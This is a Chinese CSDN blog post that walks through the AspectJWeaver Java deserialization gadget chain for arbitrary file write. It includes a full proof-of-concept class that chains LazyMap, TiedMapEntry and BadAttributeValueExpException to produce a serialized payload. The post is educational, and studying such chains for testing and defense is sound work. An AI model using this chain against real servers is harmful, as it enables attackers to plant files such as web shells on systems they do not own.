AspectJWeaver反序列化

最新推荐文章于 2024-09-05 10:39:00 发布
最新推荐文章于 2024-09-05 10:39:00 发布
阅读量323 收藏 5
点赞数 4
分类专栏: java安全 文章标签: java
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/2301_79724395/article/details/140768656
版权

AspectJWeaver反序列化

其实没有什么好讲的,随便水一下,因为学过cc链都知道了利用

aspectjweaver中有一个SimpleCache类,SimpleCache类中的内部类StoreableCachingMap是一个继承HashMap的类。

看到它的put方法

public Object put(Object key, Object value) {
			try {
				String path = null;
				byte[] valueBytes = (byte[]) value;
				
				if (Arrays.equals(valueBytes, SAME_BYTES)) {
					path = SAME_BYTES_STRING;
				} else {
					path = writeToPath((String) key, valueBytes);
				}
				Object result = super.put(key, path);
				storeMap();
				return result;
			} catch (IOException e) {
				trace.error("Error inserting in cache: key:"+key.toString() + "; value:"+value.toString(), e);
				Dump.dumpWithException(e);
			}
			return null;
		}

一眼顶真可以写文件,跟进writeToPath((String) key, valueBytes)

private String writeToPath(String key, byte[] bytes) throws IOException {
    String fullPath = folder + File.separator + key;
    FileOutputStream fos = new FileOutputStream(fullPath);
    fos.write(bytes);
    fos.flush();
    fos.close();
    return fullPath;
}

文件路径就是folder + File.separator + key;全部都是可以控制的

那怎么触发put方法,如果有cc的依赖的话,看到我们的lazymap

public Object get(Object key) {
        // create value for key if key is not currently in the map
        if (map.containsKey(key) == false) {
            Object value = factory.transform(key);
            map.put(key, value);
            return value;
        }
        return map.get(key);
    }

懂的都懂了,也不需要我多说了
链子,yso里也有

import org.apache.commons.collections.functors.ConstantTransformer;
import org.apache.commons.collections.keyvalue.TiedMapEntry;
import org.apache.commons.collections.map.LazyMap;
import javax.management.BadAttributeValueExpException;
import java.io.ByteArrayInputStream;
import java.io.ByteArrayOutputStream;
import java.io.ObjectInputStream;
import java.io.ObjectOutputStream;
import java.lang.reflect.Constructor;
import java.lang.reflect.Field;
import java.nio.charset.StandardCharsets;
import java.util.Base64;
import java.util.HashMap;
import java.util.Map;

public class test {
    public static void main(String[] args) throws Exception {
        // 反射获取构造函数
        Constructor con = Class.forName("org.aspectj.weaver.tools.cache.SimpleCache$StoreableCachingMap").getDeclaredConstructor(String.class,int.class);
        con.setAccessible(true);
        // 实例化对象
        HashMap map = (HashMap)con.newInstance("D:", 1);
        // 这里用到ConstantTransformer是为了构造value,即写入文件的值
        ConstantTransformer transform = new ConstantTransformer("12321321".getBytes(StandardCharsets.UTF_8));
        // 返回一个LazyMap对象
        Map outmap = LazyMap.decorate(map,transform);
        // 利用TiedMapEntry和BadAttributeValueExpException,使反序列化BadAttributeValueExpException对象的时候触发LazyMap的get方法
        TiedMapEntry tiedmap = new TiedMapEntry(outmap,"1.txt");
        // 这里是为了序列化时不触发LazyMap的get方法
        BadAttributeValueExpException poc = new BadAttributeValueExpException(1);
        Field val = Class.forName("javax.management.BadAttributeValueExpException").getDeclaredField("val");
        val.setAccessible(true);
        val.set(poc,tiedmap);

        // 序列化
        ByteArrayOutputStream out = new ByteArrayOutputStream();
        ObjectOutputStream oos = new ObjectOutputStream(out);
        oos.writeObject(poc);
        System.out.println(Base64.getEncoder().encodeToString(out.toByteArray()));
        // 反序列化
        ByteArrayInputStream in = new ByteArrayInputStream(out.toByteArray());
        ObjectInputStream ois = new ObjectInputStream(in);
        ois.readObject();
    }
}

参考

https://xz.aliyun.com/t/11499?time__1311=Cq0xRDnD070QitD%2FWriQqwEb8%3DP40K44dx#toc-0

nn0nkey k1n9
关注
  • 4
    点赞
  • 5
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
《WEB安全渗透测试》(36) JAVA反序列化工具ysoserial使用介绍
午夜安全
05-31 1802
作者介绍:ysoserial是一款用于生成利用不安全的Java对象反序列化的有效负载的概念验证工具。ysoserial其实就是工具,集合了各种java反序列化的payload,利用它可以方便的测试反序列化漏洞。
(渗透学习)ysoserial工具使用--java反序列化漏洞利用
热门推荐
yang1234567898的博客
01-03 1万+
工具下载地址:https://github.com/angelwhu/ysoserial 使用方法可参考:https://blog.csdn.net/weixin_34275734/article/details/92243836 靶场webgoat---Insecure Deserializetion---5 分析漏洞: 题目给的数据是rO0AB开头,所以是经过了base64加密的java序列化对象。 解码后是一段英文,百度翻译也没发现有啥用处: 题目还给出了一个接收序列化数据的表单.
[Java反序列化]AspectJWeaver反序列化
feng的博客
03-03 1579
[Java反序列化]AspectJWeaver反序列化 前言 2021年二月份ysoserialize增加了这条AspectJWeaver链子,之后陆续在2021年的D3CTF以及国赛决赛中都出现了这条链子的攻击,所以学习一下AspectJWeaver反序列化,之后再复现一下D3CTF和国赛决赛的两道Java。 依赖 <dependency> <groupId>commons-collections</groupId>
Sangfor华东天勇战队:AspectJWeaver反序列化利用链
bring_coco的博客
06-26 268
因为只要能触发SimpleCache$StoreableCachingMap的put方法就能执行文件写入操作,CommonCollections中的LazyMap的get方法中存在put方法的调用。可以看到用的内部类,且是私有方法,两个参数分别为String和int类型,所以反射调用的时候需要。可以看到生成了611.txt文件,并且写入了内容。可以看到key代表文件名,value代表文件内容。然后实例化,就可以调用其put方法了,如下。那么我们看看我们调用的哪个函数写入的。为什么要用到CC链呢?
【Web】浅聊Java反序列化AspectJWeaver——任意文件写入
uuzeray的博客
03-10 1385
AspectJWeaverAspectJ 框架的一部分,是一个用于实现面向切面编程(AOP)的工具。AspectJWeaver 提供了在 Java 程序中使用 AspectJ 的功能,并通过字节码操纵技术来织入切面代码到应用程序的目标类中。这篇文章不聊怎么任意利用文件写入进而来RCE,只学习一下如何利用AspectJWeaver通过反序列化来进行任意文件写入。
GeoJsonPoint反序列化问题
qq_45442257的博客
01-14 1139
序列化对象类 package com.tanhua.commom.pojo; import jdk.nashorn.internal.ir.annotations.Ignore; import lombok.AllArgsConstructor; import lombok.Data; import lombok.NoArgsConstructor; import org.bson.types.ObjectId; import org.springframework.data.annotation.Id;
完美解决fastJson泛型多层级嵌套,类型转化错误
qq_42896721的博客
03-25 6424
fastJson完美处理多层嵌套问题
Java安全之Dubbo反序列化漏洞分析
m0_65462541的博客
12-21 2199
0x00 前言 最近天气冷,懒癌又犯了,加上各种项目使得本篇文断断续续。 0x01 Dubbo Dubbo是阿里巴巴开源的基于 Java 的高性能 RPC(一种远程调用) 分布式服务框架(SOA),致力于提供高性能和透明化的RPC远程服务调用方案,以及SOA服务治理方案。dubbo 支持多种序列化方式并且序列化是和协议相对应的。比如:Dubbo支持dubbo、rmi、hessian、http、webservice、thrift、redis等多种协议。 运行机制 Dubbo框架启动,容器Contai
JAVA基础:数据类型、命名规范
最新发布
weixin_53755148的博客
09-05 1276
变量类型就是用来指定变量中存储数据的类型。也称为数据类型。
okhttp,retrofit,rxjava 是如何配合工作的 作用分别是什么
追梦的鱼儿
09-04 512
OkHttp、Retrofit 和 RxJava 是 Android 开发中常用的三种库,它们各自有不同的作用,并且可以很好地配合工作来实现网络请求和响应的处理。
SpringBoot 项目集成 xxl-job
qq_58159506的博客
09-03 665
SpringBoot 项目集成 xxl-job
nmt---Docker-compose自动化部署
qq_69920145的博客
09-03 1023
static-rr 权重, leastconn 最少连接, source 请求IP, 轮询 roundrobin。# 这⾥是容器中的IP地址,由于配置的是轮询roundrobin,weight 权重其实没有⽣效。# 这⾥是容器中的IP地址,由于配置的是轮询roundrobin,weight 权重其实没有⽣效。# 在 mysql 创建⼀个没有权限的haproxy⽤户,密码为空。# 在 mysql 创建⼀个没有权限的haproxy⽤户,密码为空。10. docker-compose移除容器。
Java Web开发中,如何保障应用的安全性?请列举常见的安全策略和措施。请解释Spring框架中的事务管理,包括声明式事务和编程式事务。
weixin_53180424的博客
09-03 965
在实际开发中,声明式事务管理因其非侵入性和易维护性而更受欢迎。它允许开发者将注意力集中在业务逻辑上,而不是事务管理的细节上。然而,在某些特殊场景下,编程式事务管理可能提供更灵活的控制力。因此,在选择事务管理方式时,应根据实际需求和场景来决定。
计算机毕业设计选题推荐-任务管理系统-项目任务分配系统-Java/Python项目实战
IT研究室的博客
09-03 824
随着信息化技术的迅猛发展,各类企业和组织越来越依赖于高效的任务管理系统以保证其日常运营的顺利进行。根据IDC(国际数据公司)发布的报告显示,全球企业在数字化转型上的投入已达数千亿美元,其中相当一部分资金用于提升企业内部的管理效率。任务管理系统作为企业信息化的重要组成部分,能有效帮助企业分配、监控和反馈任务,从而提高工作效率。然而,尽管市场上已有多种任务管理系统,它们在功能、用户体验和适用性上存在显著差异。
数据访问:JPA
hhgh_的博客
09-02 1022
其二,Sun希望整合ORM 技术,实现统一的 API调用接口。@Table(name=“”,catalog=“”,schema=“”)可选,用来标注一个数据库对应的实体类,数据库中创建的表明默认和类名一致,通常和@Entity配合使用,只能标注在实体的class定义处,表示实体对应的数据库表的信息。@Entity(name=“EntityName”)必须,用来标注一个数据库表对应的实体,数据库中创建的表明默认和类名一致,其中,name可选,对应数据库中的一个表,使用此注解标记Pojo是一个JPA实体。
MapStruct-Java实体转换利器
m0_63622279的博客
09-02 522
MapStruct 是一个用于生成映射器接口的代码生成库,主要用于简化 Java 对象之间的转换过程。在处理不同模型之间数据转换时,MapStruct 可以自动生成实现类减少手工转换逻辑的工作量。使用场景:各种模型之间的转换。BODTOVOPOJO引入mapstruct的pom依赖定义mapper接口(注意,这里不是MyBatis的Mapper哦),使用@Mapper注解标记,并在接口中声明映射方法。编写映射方法,(从xxxO转换为yyyO,模型之间的转换)在业务层中使用Mapper。
JavaWeb(基于SpringBoot开发)全总结(1)
2302_81420820的博客
09-02 1000
再到spring boot中去设置,当我们遇到报错不要紧,我们直接再复制我们在DG上面写的sql语句,到idea那个数据库那里再运行一次,2.由于使用不同开发工具开发出来的略有不同,导致不能够互通,所以国际规定,使用maven创建的项目为统一标准结构,也就是下图所示的结构。还有我们写的案例里面的mapper层写的sql语句的新增,删除,等等操作,都是基于mybatis来实现的。例如:传入的是路径参数,json格式的参数等等,根据不同的参数我们使用不同的注解。
Java对象序列化与反序列化详解
"本章主要介绍了Java对象的序列化与反序列化,包括基本概念、实现过程、相关接口以及注意事项。" 在Java编程中,对象的序列化与反序列化是两个重要的概念。对象序列化是将Java对象转换为可存储或可传输的二进制字节...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值